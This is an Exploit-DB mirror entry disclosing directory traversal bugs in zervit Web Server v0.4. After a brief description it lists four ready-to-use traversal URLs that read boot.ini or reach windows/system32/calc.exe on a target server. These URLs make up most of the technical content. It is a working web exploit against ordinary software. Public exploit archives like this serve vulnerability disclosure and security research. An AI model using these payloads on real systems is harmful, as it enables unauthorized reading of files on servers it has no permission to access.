exploit-db-mirror/exploits/windows/remote/12582.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

26 lines
No EOL
1,018 B
Text

###################################################################
#
# zervit Web Server v0.4 Directory Traversals
# Found By: Dr_IDE
# Date: May 12, 2010
# Download: http://zervit.sourceforge.net/
# Tested on: Windows 7
#
###################################################################
- Description -
zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest
version of the application available.
zervit HTTP Server is vulnerable to remote directory traversal attacks. Other traversal bugs
have been released for this server but this can be done from a browser, no need for Host headers.
- Technical Details - (This is with Directory Listing = On or Off)
http://[ webserver IP][:port]index.html?../../../../../boot.ini
http://[ webserver IP][:port]index.html?..\..\..\..\..\boot.ini
http://[ webserver IP][:port]calc.exe?../../../../windows/system32/calc.exe
http://[ webserver IP][:port]calc.exe?..\..\..\..\windows\system32\calc.exe
#[pocoftheday.blogspot.com]